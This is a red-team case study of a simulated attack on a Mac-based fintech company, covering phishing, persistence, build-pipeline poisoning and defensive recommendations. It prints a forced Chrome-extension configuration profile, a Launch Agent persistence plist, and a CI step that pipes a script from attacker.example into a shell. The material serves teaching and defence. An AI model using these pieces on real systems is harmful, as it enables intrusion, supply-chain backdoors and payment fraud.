Case study

New tricks: simulating adversary tactics in modern, macOS environments

Darryl Meyer, Security Consultant
March 2020

In traditional corporate environments, where Windows desktop PCs, Windows servers, and private networks are used, Active Directory (AD) is often the driving force behind all the moving parts. The need for AD is lost, however, when businesses break away from what is considered a typical IT infrastructure. These modern companies favor Apple over Windows, deploying MacBook workstations and Linux servers across the network. With less red tape, they adopt new technologies at speed, and a lean workforce enables them to adapt to change with ease. Remote working is commonplace, and there is no dependency on legacy software.

Still, like their traditional counterparts, these organizations require solutions for infrastructure, communication, collaboration, identity and access management, device management, and so on. However, they manage them using alternative solutions, such as: 

  • A mobile device management solution (MDM) to remotely administer devices 
  • An identity and access management (IdAM) service to facilitate centralized access control to online services for communication, collaboration, and cloud infrastructure  

They often also adopt a default cloud-first strategy, removing the need for cloud migration to digitize their infrastructure.  
 

A change in tactics

In attacks against organizations that use Windows workstations and Active Directory, the compromise of a Domain Administrator (DA) account is often sufficient to enable the final phase of the cyber kill chain – performing actions on objectives. Where AD is not used, a change in tactics is required. Although DA accounts may not exist in these alternative infrastructures, compromising administrator accounts for MDM, cloud, or IdAM solutions can prove just as lucrative. 

The consequences of such compromises include, but are in no way limited to: 

  • MDM: command execution on all managed endpoints, achieved by pushing arbitrary executable code to them 
  • Cloud: direct attacker access to the servers hosting and processing sensitive information 
  • IdAM: access to online applications, and through them to sensitive resources or detailed information that reveals sensitive assets 


Engagement walkthrough

This walkthrough of a simulated adversarial attack is designed to help Mac-centric companies with alternative approaches to network management and general operations. It is also for organizations planning to move away from Windows architecture, thus seeking guidance on the opportunities and risks of this new venture, as well as the shift in mindset it demands. Either reader will gain an understanding of the techniques used by potential adversaries, their persistence, and what they are capable of.  

The scenario loosely replicates an F-Secure engagement with one such company, which, for the purposes of this article, we’ll refer to as TechOrg.  
 

Background

TechOrg is a fintech firm with over 200 employees, offices in multiple countries across the world, no Security Operations Centre (SOC), a cloud-first infrastructure, and MacBook workstations. Access to internally hosted services – such as the source code repository, DevOps tooling, and backend support systems – is provided over VPN. All other services, such as email, chat, and collaboration, are provided by third parties like Google G Suite, Microsoft Office 365, and Slack. Authentication to these services is performed through an IdAM solution and secured by hardware security keys. 

F-Secure was tasked with simulating a cyber attack against TechOrg. The purpose of this simulation was to demonstrate attack paths leading to the compromise of sensitive company assets, and to provide appropriate recommendations for the flaws and weaknesses identified on said paths. 
 

Simulation objective: extract funds directly from both the organization and its users. 

Persistent attackers have clear goals. In this case, F-Secure's goal was to gain access to users’ data and use it in further attacks to steal funds from both the users and TechOrg itself. Although TechOrg has online business banking accounts, the attack team focused instead on the movement of money through its systems: from one user to another, from the organization to users, and vice versa. As such, the team selected a route that would position it within TechOrg’s live systems to modify payments in transit. 

The choice faced by the team was between positioning itself on a server within the production environment that had privileged network access, or embedding itself within the production applications themselves. Either option has advantages from an attacker’s perspective; however, the latter promised a privileged position with fewer triggers of suspicious activity – provided the attack team could maintain a low-and-slow presence. It would also enable the team to withstand cloud infrastructure redeployments. 
 

Step 1: Perimeter breach

The engagement bypassed the open source intelligence-gathering stage of the kill chain, instead assuming a starting position at the point of perimeter breach. Although open source intelligence gathering may have provided unexpected insights and opened other avenues of attack, it would have required significant effort to be relevant and effective. Instead, members of the attack team worked closely with the client to simulate realistic threat actor techniques. 

A breach initiated through the compromise of services exposed on internet-facing infrastructure – such as web applications and VPN servers – was quickly ruled out. This is because TechOrg exposed very little internet-facing infrastructure, and it had secured what was exposed well. Phishing was chosen instead, using methods typically seen in attacks against financial companies. This combined a malicious payload delivered via email with credential phishing, in which social engineering is used to convince employees to reveal private credentials. 

Using employee credentials to attempt IdAM system access can be very lucrative, depending on whose credentials are obtained. Compromising an administrator could allow direct access to the target environment’s servers. However, administrators represent a relatively small attack surface, generally protected by heightened security controls. The privileges of other employees can instead be enough: for example, a developer with excessive permissions within a sensitive infrastructure, or finance staff with unrestricted access to private financial information and applications. 

Traditional phishing payloads, like a Microsoft Word document containing macros that run malicious executables, are less likely to work against an organization that uses Apple devices. Although Word and Excel are available for macOS, modern versions of the software run in a sandbox. There is a possibility that the phishing target is running a version of the software un-sandboxed – perhaps even one vulnerable to the previously identified sandbox breakout affecting older versions [1] – but there is no guarantee. 

After assessing the options, the team arrived at a choice of two phishing payloads:

  • A signed and notarized macOS application – capable of passing Gatekeeper [2] – that would fetch and run the malicious code 
  • An MDM configuration profile that would install a malicious browser extension into Google Chrome from the Chrome Web Store 

The first of these options is more generic from an attacking perspective, and leaves open many further avenues of attack. It is also possible, however, that employees may be more suspicious about installing an application. Furthermore, the application would be subject to any additional endpoint security controls. 

The second option aims to gain access to all authorized session tokens stored in an employee’s browser. This would allow the team to connect to whichever internet-facing services that employee was authenticated to, in anticipation that some would contain sensitive user information. This option relies on the installation of a configuration profile being more plausible to the target than the installation of an application, as well as on the relative obscurity of a browser add-on. 
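As an illustration of the second option, Chrome on macOS honours managed policies delivered via configuration profile, including the `ExtensionInstallForcelist` policy that silently force-installs an extension from the Chrome Web Store. The fragment below is a simplified sketch; the payload identifiers and extension ID are placeholders, not those used in the engagement.

```xml
<!-- Simplified .mobileconfig payload fragment (hypothetical identifiers).
     Forces Chrome to install the listed extension from the Web Store. -->
<dict>
    <key>PayloadType</key>
    <string>com.google.Chrome</string>
    <key>PayloadIdentifier</key>
    <string>com.example.chrome-policy</string>
    <key>PayloadUUID</key>
    <string>00000000-0000-0000-0000-000000000000</string>
    <key>PayloadVersion</key>
    <integer>1</integer>
    <key>ExtensionInstallForcelist</key>
    <array>
        <!-- Format: "<extension-id>;<update-url>" -->
        <string>aaaabbbbccccddddeeeeffffgggghhhh;https://clients2.google.com/service/update2/crx</string>
    </array>
</dict>
```

Because the extension is hosted on the legitimate Chrome Web Store and installed by policy rather than by the user, the mechanism itself raises few visible warnings once the profile has been accepted.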
 

Step 2: Lateral movement

After consideration, option one was chosen: the signed and notarized application. This choice was driven by the remote code execution it provided on a workstation, allowing the team to gather sensitive files from that workstation and pivot further into the environment. From this position, lateral movement – the next step of the kill chain – could proceed. 

The default security mechanisms on macOS won’t stop custom malware like the type F-Secure leveraged against TechOrg. They are intended to prevent the execution of known malware, whilst enabling users to decide what gets executed on their MacBook. If the pretext is sufficiently convincing, that is not a problem for the attacker. The pretext chosen was that the user had to install an application to apply an MDM configuration update that could not be applied automatically by the administrators. Added legitimacy was achieved by providing installation instructions in an online document linked from the email, and by making sure the email and document matched the company’s brand style. 

Persistence (maintaining a foothold) on macOS is also possible without default security mechanisms raising any red flags. The chances of detection increase if a MacBook user has installed third-party software to monitor the known and commonly used persistence locations, such as Launch Agents or Launch Daemons. Still, with a sufficiently convincing pretext, the user would not be suspicious of the application asking for permission to add a Login Item, or whatever the case may be. 
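As a concrete example, user-level persistence via a Launch Agent requires nothing more than dropping a property list into `~/Library/LaunchAgents`; no elevated privileges are needed. The label and program path below are hypothetical, not those used in the engagement.

```xml
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN"
  "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<!-- ~/Library/LaunchAgents/com.example.updater.plist (hypothetical).
     launchd runs the referenced program at every login and restarts it
     if it exits. -->
<plist version="1.0">
<dict>
    <key>Label</key>
    <string>com.example.updater</string>
    <key>ProgramArguments</key>
    <array>
        <string>/Users/Shared/.updater</string>
    </array>
    <key>RunAtLoad</key>
    <true/>
    <key>KeepAlive</key>
    <true/>
</dict>
</plist>
```

Monitoring tools that watch the LaunchAgents and LaunchDaemons directories are precisely what raises the detection odds mentioned above.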

With remote code execution and persistence achieved, the attack team began its intelligence-gathering exercise on the infected MacBook, conducting internal reconnaissance. With lateral movement complicated by TechOrg’s cloud infrastructure – and no directory service – it was necessary to use information directly available on the compromised workstation and on the internal network. Additionally, with the absence of exploitable open services on other workstations, or remote administration services with shared administrator accounts, other techniques were needed to achieve lateral movement.  

It became necessary either to exploit an internal system – preferably a dual-homed one, allowing a pivot into another environment – or to conduct a watering hole attack against other employees until someone with higher privileges was compromised. 

TechOrg developed its proprietary software using DevOps processes, practices, and tooling. Through its reconnaissance, the attack team identified the source code repository for the production applications, as well as a build automation system. The latter, it transpired, was continually tasked with building the production applications. 

Although it would be possible to push malicious code to the source code repository, the attack team quickly discovered that there were strong controls in place that would likely flag the malicious pull request. It instead concentrated on the build automation system, which was an enticing target for the following reasons: 

  • Build systems usually provide reach into sensitive environments inaccessible from the internal user network. 
  • Build systems store secrets, keys, and credentials to access, build, and deploy software, which could allow for: 
    • Read and (possibly) write access to private source code repositories 
    • System-level access to servers where the software is built 
  • Backdooring software at build time can be carried out after the source code has been reviewed in the version control system, bypassing the above-mentioned strong controls. 

A secrets management misconfiguration was identified in the build automation system, enabling the team to assume the permissions of an administrative account. This account could alter build pipeline configurations, thus enabling the poisoning of any of the builds completed by the system. 
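To illustrate why pipeline-edit rights are so dangerous, the sketch below uses a generic, YAML-style CI syntax (not the actual system or configuration from the engagement) to show how a single injected step can backdoor an artifact after the reviewed source has been checked out.

```yaml
# Generic CI pipeline sketch (hypothetical syntax, names, and URLs).
# Review controls cover what enters the repository; nothing here
# re-checks the source between checkout and compilation.
stages:
  - checkout:
      run: git clone https://git.internal.example/payments-app.git .
  # Step injected by an attacker with pipeline-edit rights: patches
  # the payment routine after code review, before compilation.
  - poison:
      run: curl -s https://attacker.example/patch.sh | sh
  - build:
      run: make release
  - deploy:
      run: ./deploy.sh production
```

Because the backdoor never touches version control, the strong review controls on the repository are bypassed entirely, which is exactly the weakness exploited in the next step.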

Step 3: Actions on objectives

It was agreed that the vulnerability adequately demonstrated the feasibility of backdooring TechOrg’s production code deployments without introducing any malicious code. By poisoning the production application at build time, strong controls placed on the source code repository and cloud environment could be bypassed, whilst still having the malicious code reach the production environment. With that reach, a real attacker would be able to interact directly with the application database to view sensitive user data and adjust account information. It would also have been possible to alter data passing through the system to modify payer or payee information. The implications of this reach signalled the team’s success in achieving the main simulation objectives. 

Recommendations

The following recommendations were provided to TechOrg to address the risks discussed above: 
 

Identify phishing attempts

Phishing attacks threaten all organizations, regardless of operating system, and the likelihood of a successful attack can be minimized just as universally. 

  • Customize the appearance of tools such as G Suite or Office 365 to make it easier for staff to recognize when they are accessing the legitimate company instances and not a phishing clone of the website. 
  • Apply and configure the advanced email security features supported by the platform in use. Both G Suite and Office 365 offer these to help protect against phishing. 
  • Flag emails from external sources, for example with a rule that rewrites the subject line of any email originating from outside the organization. 
  • Train staff to be aware of credential phishing techniques and of the red flags that appear when a trusted website is being proxied for credential phishing. Staff should also know the process for reporting suspicious activity. 

 

Minimize the attack surface (most relevant to lateral movement) 
  • Multi-factor authentication should be enforced by default. Hardware security keys should be the first choice; push notifications to a mobile device are an acceptable second option. 
  • A VPN should be used when accessing internal company resources (whether on-premises or in the cloud). 
  • Application whitelisting – though a huge undertaking – has significant positive implications and presents a substantial hurdle to attackers. 
  • Macs should be managed using an MDM with the configuration hardened to meet business requirements, whilst being as secure as possible. Some considerations when configuring an MDM for MacBooks are ensuring:
    • Device encryption is enforced 
    • A secure device password policy is applied 
    • Services not required by the company are disabled 
    • Installation of additional configuration profiles is disallowed after the configuration is complete 
  • Keep workstation software up to date, preferably automatically through the MDM. For software installed outside of the MDM, users should be alerted when their software is out of date. 
  • Connections to the VPN originating from networks other than those trusted by the company, such as the office Wi-Fi, should require multi-factor authentication. 

DevOps
  • Source code repositories should be treated as high-value assets and secured as such. The most restrictive permissions should be applied on both read and write operations to the repository. Separate repositories for all projects will allow for easier application of a principle of least privilege to source code. Pull requests and commits should be reviewed and approved. Commits should be signed by developers. The purpose of these controls is to prevent unauthorized individuals from viewing source code and similarly prevent malicious code from being added to the repository.  
  • Build automation systems should be appropriately secured and strict access controls applied. The rights assigned to users who can administer the system and modify build pipelines and configurations should follow the principle of least privilege and be strictly controlled. Similar controls should be applied to accounts created or used for the build process itself, if applicable. Care should also be taken to eliminate the chance of sensitive data leaking through a secrets management misconfiguration or other information sources in the system. 
  • If the build process pulls assets and libraries from other sources under the organization’s control, the same strict security controls should be applied to those systems as well. If libraries are pulled from online sources such as Github or the npm registry, cached-known good versions should be used in production builds to help minimize the likelihood of a supply chain attack in which compromised libraries are included in the build. When a version change of the library is required, it should be appropriately assessed before being accepted. 
  • If the build tools and automation systems are hosted within a cloud environment, it should be properly secured by ensuring that the critical components, such as IdAM and data storage providers, are locked down and properly configured. The principle of least privilege should be applied to cloud infrastructure and can go a long way to mitigating the risk of lateral movement through cloud services. 
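On the commit-signing recommendation above, the developer-side setup is inexpensive. The commands below show standard Git configuration for GPG signing (the key ID is a placeholder); rejecting unsigned commits must additionally be enforced server-side in the repository hosting platform.

```shell
# Tell Git which GPG key identifies this developer (placeholder key ID)
git config --global user.signingkey 0xDEADBEEF

# Sign every commit by default
git config --global commit.gpgsign true

# Verify signatures when inspecting history
git log --show-signature -1
```

Signed commits make it considerably harder for an attacker with stolen repository credentials to impersonate a developer.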
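One way to pin builds to cached, known-good dependency versions is hash-checking, shown below as a sketch using pip's hash-checking mode; the package, version, and digest are placeholders. Equivalent lockfile mechanisms exist for npm and other ecosystems.

```shell
# requirements.txt pins each dependency to an exact version and digest
# (the version and sha256 value shown are placeholders):
#
#   requests==2.23.0 \
#       --hash=sha256:<digest-of-the-vetted-artifact>
#
# The install then aborts if the registry serves anything whose
# hash does not match the vetted artifact:
pip install --require-hashes -r requirements.txt
```

A version bump then becomes an explicit, reviewable change to the digest, giving the assessment step described above a natural place in the workflow.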
     
Detection and Response

Software development businesses should be able to detect security events across all endpoints, including workstations and servers. These events should be aggregated and sent to a security information and event management (SIEM) system, where rules can be created to identify events worth investigating and logs can be retained for historical analysis. Once this has been established, the organization’s ability to detect realistic attacks should be assessed. 

  • Endpoint detection and response (EDR) is recommended. EDR solutions exist for macOS and Linux, and their capabilities are increasing in the face of growing threats to organizations using non-Windows workstations or servers. 
  • Logs from workstations, servers, and cloud environments should be aggregated and stored to aid detection and response processes. Cloud providers usually offer monitoring services for hosted infrastructure that can be directed to a SIEM. macOS includes default log streaming capabilities; however, for greater insight, additional software is required to gather detection information and to perform ad hoc queries. 
  • Identify risks and risk scenarios within the CI/CD environment and add these to the monitoring capability of the SIEM.
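A lightweight first step towards the above, sketched below, is to pre-filter the JSON events that endpoint tooling emits against a watchlist before forwarding them to the SIEM. The field names and watchlist here are illustrative, not tied to any particular product.

```python
# Sketch: pre-filter endpoint log events before forwarding to a SIEM.
# Field names ("process", "message") and the watchlist are illustrative.

WATCHLIST = {"osascript", "curl", "launchctl"}  # processes worth flagging


def is_suspicious(event: dict) -> bool:
    """Return True if the event's originating process is on the watchlist."""
    return event.get("process", "").lower() in WATCHLIST


def filter_events(events: list) -> list:
    """Keep only events that warrant forwarding for investigation."""
    return [e for e in events if is_suspicious(e)]


events = [
    {"process": "Safari", "message": "page load"},
    {"process": "launchctl", "message": "load ~/Library/LaunchAgents/x.plist"},
]
print(filter_events(events))  # only the launchctl event survives
```

In practice, rules like this would live in the SIEM itself; the point is that CI/CD and persistence-related events (such as Launch Agent loads) deserve explicit detection logic.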
     

Summary

The predict, prevent, detect, and respond (PPDR) framework still applies to modern tech organizations and should form the foundation of their strategy, as do tried and tested prevention strategies. 

This includes taking measures to ensure the software those organizations create and deploy has been assessed for vulnerabilities. All systems along the path of application creation – from development workstations, to build automation systems and production deployment environments – should be assessed. A single weak link may be all that is required to compromise critical assets.  

While prevention is important, its limitations ought to be acknowledged, and detection and response capabilities introduced and monitored as well. Where alerting typically focused on the environment, it should now be extended to cover higher-risk DevOps vulnerabilities. 

In non-traditional environments like these, the target shifts from user workstations to the code in CI/CD pipelines and the cloud server infrastructure. CI/CD pipelines and systems need to be secured and treated as instrumental to an organization’s critical assets – and thus as critical themselves. Cloud infrastructure security is often treated as an afterthought: assumed to be secure by default, or the service provider’s responsibility. However, a compromise of either could have disastrous consequences. A compromise of the build environment can result in a production compromise, as in the case of TechOrg, which may lead to unrecoverable losses. 

Simulated activity often does not conclude with radical shifts in mindset or bombshell moments. Instead, continuous testing and improvement across offensive, defensive, and collaborative activities offers gradual but measurable improvement. For TechOrg, the F-Secure attack team highlighted shortcomings in its existing controls that could, if exploited, have had a major effect, and provided the organization with realistic recommendations for remediation. 

 
